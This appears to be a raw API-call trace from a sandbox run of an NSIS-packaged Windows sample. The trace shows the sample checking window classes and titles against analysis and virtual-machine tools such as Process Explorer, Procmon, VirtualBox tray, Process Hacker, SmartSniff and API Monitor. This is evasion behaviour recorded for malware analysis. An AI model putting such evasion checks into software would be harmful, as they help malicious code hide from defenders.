lpString1="Button") returned="Button" [0158.661] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="65660") returned 5 [0158.661] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.661] lstrlenA (lpString="0") returned 1 [0158.661] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.661] lstrlenA (lpString="Button") returned 6 [0158.661] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.661] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCEXPL", iMaxLength=1024 | out: lpString1="PROCEXPL") returned="PROCEXPL" [0158.661] lstrcmpiA (lpString1="Button", lpString2="PROCEXPL") returned -1 [0158.661] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.661] lstrlenA (lpString="Button") returned 6 [0158.661] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="PROCMON_WINDOW_CLASS", iMaxLength=1024 | out: lpString1="PROCMON_WINDOW_CLASS") returned="PROCMON_WINDOW_CLASS" [0158.662] lstrcmpiA (lpString1="Button", lpString2="PROCMON_WINDOW_CLASS") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="VBoxTrayToolWndClass", iMaxLength=1024 | out: lpString1="VBoxTrayToolWndClass") returned="VBoxTrayToolWndClass" [0158.662] lstrcmpiA (lpString1="Button", lpString2="VBoxTrayToolWndClass") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", 
iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.662] lstrcmpiA (lpString1="Button", lpString2="VMSwitchUserControlClass") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessLasso_Notification_Class", iMaxLength=1024 | out: lpString1="ProcessLasso_Notification_Class") returned="ProcessLasso_Notification_Class" [0158.662] lstrcmpiA (lpString1="Button", lpString2="ProcessLasso_Notification_Class") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="SmartSniff", iMaxLength=1024 | out: lpString1="SmartSniff") returned="SmartSniff" [0158.662] lstrcmpiA (lpString1="Button", lpString2="SmartSniff") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, 
lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.662] lstrcmpiA (lpString1="Button", lpString2="ProcessHacker") returned -1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}", iMaxLength=1024 | out: lpString1="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}" [0158.662] lstrcmpiA (lpString1="Button", lpString2="{0843FD01-1D28-44a3-B11D-E3A93A85EA96}") returned 1 [0158.662] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrlenA (lpString="Button") returned 6 [0158.662] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.662] lstrcpynA (in: lpString1=0x40b018, lpString2="SysAnalyzer", iMaxLength=1024 | out: lpString1="SysAnalyzer") returned="SysAnalyzer" [0158.662] lstrcmpiA (lpString1="Button", lpString2="SysAnalyzer") returned -1 [0158.663] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.663] lstrlenA (lpString="Button") returned 6 [0158.663] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.663] lstrcpynA (in: lpString1=0x40b018, lpString2="VMSwitchUserControlClass", iMaxLength=1024 | out: lpString1="VMSwitchUserControlClass") returned="VMSwitchUserControlClass" [0158.663] lstrcmpiA (lpString1="Button", lpString2="VMSwitchUserControlClass") returned -1 [0158.663] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Button", 
iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.663] lstrlenA (lpString="Button") returned 6 [0158.663] lstrcpynA (in: lpString1=0x40ac18, lpString2="Button", iMaxLength=1024 | out: lpString1="Button") returned="Button" [0158.663] lstrcpynA (in: lpString1=0x40b018, lpString2="ProcessHacker", iMaxLength=1024 | out: lpString1="ProcessHacker") returned="ProcessHacker" [0158.663] lstrcmpiA (lpString1="Button", lpString2="ProcessHacker") returned -1 [0158.663] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.663] lstrlenA (lpString="Start") returned 5 [0158.663] lstrcpynA (in: lpString1=0x40ac18, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.663] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.663] lstrcmpiA (lpString1="Start", lpString2="0") returned 1 [0158.663] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.663] lstrlenA (lpString="Start") returned 5 [0158.663] lstrcpynA (in: lpString1=0x33723c, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.663] lstrcpynA (in: lpString1=0x337684, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.664] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.664] lstrlenA (lpString="3399936") returned 7 [0158.664] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.664] lstrcpynA (in: lpString1=0x40a418, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.664] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.664] 
lstrcpynA (in: lpString1=0x337acc, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.664] lstrcpynA (in: lpString1=0x432800, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.664] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.664] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.665] lstrcpynA (in: lpString1=0x337684, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.665] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrlenA (lpString="") returned 0 [0158.665] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.665] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrcpynA (in: lpString1=0x337acc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.665] lstrcpynA (in: lpString1=0x432c00, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.665] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrlenA (lpString="") returned 0 [0158.665] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrlenA (lpString="") returned 0 [0158.665] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.665] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.665] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.665] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.665] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.665] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.665] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.665] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.666] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.666] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.666] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.666] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.666] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.666] lstrcpyA (in: lpString1=0x3401e0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.666] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.666] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.666] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.666] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.666] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.666] lstrcpynA (in: lpString1=0x340df8, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.667] lstrcpynA (in: lpString1=0x3401e0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.667] strstr (_Str="Start", _SubStr="- main thread") returned 0x0 [0158.667] lstrcpynA (in: lpString1=0x3401e0, lpString2="- main thread", iMaxLength=1024 | out: lpString1="- main thread") returned="- main thread" [0158.667] lstrcpynA (in: 
lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.667] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.667] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.667] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.667] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.667] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.667] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.667] lstrlenA (lpString="0") returned 1 [0158.667] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.667] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.667] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.667] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.667] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.667] lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.667] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.668] lstrlenA (lpString="0") returned 1 [0158.668] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrlenA (lpString="Start") returned 5 [0158.668] lstrcpynA (in: lpString1=0x33723c, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrcpynA (in: lpString1=0x337684, 
lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.668] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.668] lstrlenA (lpString="3399936") returned 7 [0158.668] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.668] lstrcpynA (in: lpString1=0x40a418, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.668] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.668] lstrcpynA (in: lpString1=0x337acc, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.668] lstrcpynA (in: lpString1=0x432800, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.668] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.668] lstrcpynA (in: lpString1=0x337684, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.668] lstrlenA (lpString="") returned 0 [0158.668] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.668] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.668] lstrcpynA (in: lpString1=0x337acc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.668] lstrcpynA (in: 
lpString1=0x432c00, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.669] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.669] lstrlenA (lpString="") returned 0 [0158.669] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.669] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.669] lstrlenA (lpString="") returned 0 [0158.669] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.669] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.669] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.669] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.669] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0158.669] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.669] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.669] lstrcpynA (in: 
lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.669] lstrcpynA (in: lpString1=0x33835c, lpString2="ntdll::strstr(t R1, t R0)i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t R0)i.R0 ?c") returned="ntdll::strstr(t R1, t R0)i.R0 ?c" [0158.669] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.669] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0158.669] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0158.670] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0158.670] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0158.670] lstrcpyA (in: lpString1=0x341200, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.670] lstrcpyA (in: lpString1=0x327a20, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0158.670] lstrcpyA (in: lpString1=0x327e20, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0158.670] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.670] lstrcpynA (in: lpString1=0x3401e0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.670] lstrcpynA (in: 
lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.670] lstrcpynA (in: lpString1=0x340df8, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.670] lstrcpynA (in: lpString1=0x341200, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.670] strstr (_Str="Start", _SubStr="API Monitor") returned 0x0 [0158.670] lstrcpynA (in: lpString1=0x341200, lpString2="API Monitor", iMaxLength=1024 | out: lpString1="API Monitor") returned="API Monitor" [0158.670] lstrcpynA (in: lpString1=0x341200, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.671] wsprintfA (in: param_1=0x341200, param_2="%d" | out: param_1="0") returned 1 [0158.671] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0158.671] lstrcpynA (in: lpString1=0x433400, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.671] lstrcpynA (in: lpString1=0x433000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.671] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.671] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.671] lstrlenA (lpString="0") returned 1 [0158.671] lstrcpynA (in: lpString1=0x337684, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.671] lstrcpynA (in: lpString1=0x40a418, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.671] lstrcpynA (in: lpString1=0x33723c, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.671] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.671] lstrcpynA (in: lpString1=0x432800, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.671] 
lstrcpynA (in: lpString1=0x430000, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.671] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.671] lstrlenA (lpString="0") returned 1 [0158.671] lstrcpynA (in: lpString1=0x42e3a0, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.671] lstrlenA (lpString="Start") returned 5 [0158.671] lstrcpynA (in: lpString1=0x33723c, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.671] lstrcpynA (in: lpString1=0x337684, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.671] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.671] lstrlenA (lpString="3399936") returned 7 [0158.671] lstrcpynA (in: lpString1=0x337acc, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.672] lstrcpynA (in: lpString1=0x40a418, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.672] lstrcpynA (in: lpString1=0x337684, lpString2="3399936", iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.672] lstrcpynA (in: lpString1=0x337acc, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.672] lstrcpynA (in: lpString1=0x432800, lpString2="Blue Project Software SysTracer", iMaxLength=1024 | out: lpString1="Blue Project Software SysTracer") returned="Blue Project Software SysTracer" [0158.672] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.672] lstrcpynA (in: lpString1=0x33723c, lpString2="3399936", 
iMaxLength=1024 | out: lpString1="3399936") returned="3399936" [0158.672] lstrcpynA (in: lpString1=0x337684, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.672] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.672] lstrlenA (lpString="") returned 0 [0158.672] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.672] lstrcpynA (in: lpString1=0x40a418, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.672] lstrcpynA (in: lpString1=0x337684, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.672] lstrcpynA (in: lpString1=0x337acc, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.672] lstrcpynA (in: lpString1=0x432c00, lpString2="Start", iMaxLength=1024 | out: lpString1="Start") returned="Start" [0158.672] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.672] lstrlenA (lpString="") returned 0 [0158.672] lstrcpynA (in: lpString1=0x337acc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.673] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.673] lstrlenA (lpString="") returned 0 [0158.673] lstrcpynA (in: lpString1=0x337f14, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0158.673] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0158.673] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" 
